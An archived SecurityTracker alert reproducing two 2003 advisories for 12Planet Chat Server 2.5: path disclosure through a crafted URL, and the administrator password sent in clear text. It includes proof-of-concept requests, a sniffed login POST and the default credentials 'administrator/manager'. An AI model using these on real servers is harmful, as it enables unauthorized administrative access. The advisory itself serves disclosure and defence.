Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
12Planet Chat Server Sends Administrative Password Over the Network in Clear Text
|
|
SecurityTracker Alert ID: 1006554 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Apr 11 2003
|
Impact: Disclosure of authentication information, Disclosure of system information, User access via network
|
Exploit Included: Yes
Vendor Confirmed: Yes
|
Advisory: Infowarfare.dk
|
Version(s): 2.5
|
Description: Dennis Rand at Infowarefare.dk reported two vulnerabilities in the 12Planet Chat Server. A remote user sniffing the network can obtain the administrative password. A remote user can also determine the installation path.
It is reported that the server's login page sends the password to the server in clear text without encryption. This also occurs
when a user enters expert mode and changes the administrative password.
A remote user can determine the installation directory
with the following type of URL:
http://[target]:8080/qwe/qwe/qwe/index.html
|
Impact: A remote user with the ability to sniff the network between the administrator and the server can determine the administrator's password.
A remote user can determine the installation path.
|
Solution: No vendor solution was available at the time of this entry. The vendor has reportedly suggested that customers use an SSL proxy (such as the Apache proxy) to protect administrator login credentials.
|
Vendor URL: www.12planet.com/en/software/chat/index.html (Links to External Site)
|
Cause: Access control error, Exception handling error
|
Underlying OS: Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (Solaris - SunOS), Windows (NT), Windows (2000), Windows (XP)
|
Reported By: Dennis Rand <der@infowarfare.dk>
|
Message History:
None.
|
Source Message Contents
|
Date: Fri, 11 Apr 2003 13:21:29 +0200
From: Dennis Rand <der@infowarfare.dk>
Subject: Root directory revealing vulnerability Found in 12Planet Chat Server
|
Root directory revealing vulnerability
Found in 12Planet Chat Server 2.5
http://www.12planet.com
Discovered by Dennis Rand
www.Infowarfare.dk
------------------------------------------------------------------------
-----[SUMMARY
12Planet Chat Server provides advanced chat functionalities aiming to
Offer discussion space for customers, partners and visitors.
It addresses the demand from all web sites and intranet/extranet
Portals willing to offer "sticky" services to their visitors as well
As secure and reliable real-time communication to their customers.
Its moderation option enables businesses to organize online chat c
Conferences by inviting celebrities, experts to talk with visitors and
Moderate visitor questions through a moderation process.
It is possible getting the Root directory revealed by sending
At specific URL request
-----[AFFECTED SYSTEMS
Vulnerable systems:
* 12Planet Chat Server 2.5
Immune systems:
*
-----[SEVERITY
Low - An attacker has the possibility to find the location on the server
On where the Chat Server is installed.
-----[DESCRIPTION OF WHAT THE VULNERABILITY IS
The following transcript demonstrates a sample exploitation of the
Vulnerabilities:
-------------------------------------------------------------------
Anything less then 3 times /qwe then you will only get a
HTTP 500 - Internal server error
Proof-Of-Concept exploit:
[Input in browser]
http://vuln-host:8080/qwe/qwe/qwe/index.html
[Output]
Error: 500
Internal Servlet Error:
java.io.IOException: bad path: C:\Program Files\12Planet Chat Server
v2.5.1\www\qwe\qwe\qwe\index.html
at java/io/File.canonPath
at java/io/File.getCanonicalPath
at com/sun/web/core/DefaultServlet.doGet
at javax/servlet/http/HttpServlet.service
at javax/servlet/http/HttpServlet.service
at com/sun/web/core/ServletWrapper.handleRequest
at com/sun/web/core/Context.handleRequest
at com/sun/web/server/ConnectionHandler.run
--------------------------------------------------------------------
-----[DETECTION
12Planet Chat Server 2.5 is vulnerable to the above-described attacks.
Earlier versions may be susceptible as well. To determine if a specific
implementation is vulnerable, experiment by following the above
transcript.
-----[VENDOR RESPONSE
Thank you for the bug report. We are currently analyzing the issues and
will keep you updated on the progress. 12Planet will provide assistance
to all the customers that are interested in the patch
(email to : support@12planet.com)
Best regards, Lei
12Planet
-----[DISCLOSURE TIMELINE
21/02/2003 Found the Vulnerability.
21/02/2003 Reported to iDEFENSE
31/03/2003 Received rejection from iDEFENSE
01/04/2003 Reported to 12Planet (support@12planet.com; bugs@12planet.com;
sales@12planet.com; features@12planet.com)
01/04/2003 Received response from 12Planet
11/04/2003 Public Disclosure.
-----[ADDITIONAL INFORMATION
The vulnerability was discovered by <der@infowarfare.dk> Dennis Rand
-----[DISCLAIMER
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect,
incidental, consequential, loss of business profits or special damages.
-----
Clear text password vulnerability
found in 12Planet Chat Server 2.5
http://www.12planet.com
Discovered by Dennis Rand
www.Infowarfare.dk
------------------------------------------------------------------------
-----[SUMMARY
12Planet Chat Server provides advanced chat functionalities aiming to
offer discussion space for customers, partners and visitors.
It addresses the demand from all web sites and intranet/extranet
portals willing to offer "sticky" services to their visitors as well
as secure and reliable real-time communication to their customers.
Its moderation option enables businesses to organize online chat c
conferences by inviting celebrities, experts to talk with visitors and
moderate visitor questions through a moderation process.
When starting the Administration site of the Chat Server the login
and password is sent over the net in clear text.
-----[AFFECTED SYSTEMS
Vulnerable systems:
* 12Planet Chat Server 2.5
Immune systems:
*
-----[SEVERITY
Low/Medium - An attacker is able to put a network sniffer on the
network and sniff the username and password, because
it is sent in a clear text form.
-----[DESCRIPTION OF WHAT THE VULNERABILITY IS
When sending Administrator password on the login page
the password is send in clear text.
The same problem is when you enter expert mode to change
the administrator password it will again be send in clear text.
The following transcript demonstrates a sample exploitation of the
vulnerabilities:
-------------------------------------------------------------------
[Used Ethereal to sniff the traffic between the host and server]
LOGIN PAGE:
Here is the capture of the first line of defense from the 12Planet
Chat server:
---------------------------- CUT HERE
----------------------------------------
POST /servlet/one2planet.infolet.InfoServlet HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://193.88.206.253:8080/servlet/one2planet.infolet.InfoServlet?
page=one2planet.community.core.PHLogin&technology=html&domain=default&
language=english&url=%40HTTP%3A%2F%2F193.88.206.253%3A8080%2Fservlet%2
Fone2planet.infolet.InfoServlet%3Fpage%3Done2planet.tools.PSDynPage%21
template%3D%2F12p_template%2Fwww%2Fapps%2Fchatserver%2Fwizard%2Findex.html
Accept-Language: da
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: 193.88.206.253:8080
Content-Length: 292
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: SESSIONID=To1010mC7187873103878648At
page=one2planet.community.core.PHLogin&table=user&url=@HTTP%3A%2F%2F<vuln-ho
st-ip>
%3A8080%2Fservlet%2Fone2planet.infolet.InfoServlet%3Fpage%3Done2planet.tools
.PSDynPage%21
template%3D%2F12p_template%2Fwww%2Fapps%2Fchatserver%2Fwizard%2Findex.html&
vserver=&username=administrator&passwd=manager
---------------------------- CUT HERE
----------------------------------------
ADMINISTRATION PAGE
Now if the administrator wants to change the password from the default one.
He or She enters the expert mode, from with in here it is possible to change
the password, but again the password is send in clear text.'
---------------------------- CUT HERE
----------------------------------------
page=one2planet.community.core.PHChangePassword&nickname=administrator&
psswd0=manager&psswd1=Trustno1@&psswd2=Trustno1@&submit3=OK
HTTP/1.0 200 OK
---------------------------- CUT HERE
----------------------------------------
--------------------------------------------------------------------
-----[DETECTION
12Planet Chat Server 2.5 is vulnerable to the above-described attacks.
Earlier versions may be susceptible as well. To determine if a specific
implementation is vulnerable, experiment by following the above
transcript.
-----[WORK AROUNDS
As The vendor writes they recommend their customers to add
a HTTPS layer (through Apache Proxy feature for example) to the
administration console for the deployment of production servers
-----[VENDOR RESPONSE
Thank you for the bug report. We are currently analyzing the issues and
will keep you updated on the progress. We recommend our customers to add
a HTTPS layer (through Apache Proxy feature for example) to the
administration console for the deployment of production servers, this to
solve the second issue you listed. 12Planet will provide assistance to
all the customers that are interested in the patch (email to :
support@12planet.com)
Best regards, Lei
12Planet
-----[DISCLOSURE TIMELINE
24/02/2003 Found the Vulnerability.
25/02/2003 Reported to iDEFENSE
31/03/2003 Received rejection from iDEFENSE
01/04/2003 Reported to 12Planet (support@12planet.com; bugs@12planet.com;
sales@12planet.com; features@12planet.com)
01/04/2003 Received response from 12Planet
11/04/2003 Public Disclosure.
-----[ADDITIONAL INFORMATION
The vulnerability was discovered by <der@infowarfare.dk> Dennis Rand
-----[DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect,
incidental, consequential, loss of business profits or special damages.
|
|
Go to the Top of This SecurityTracker Archive Page
|
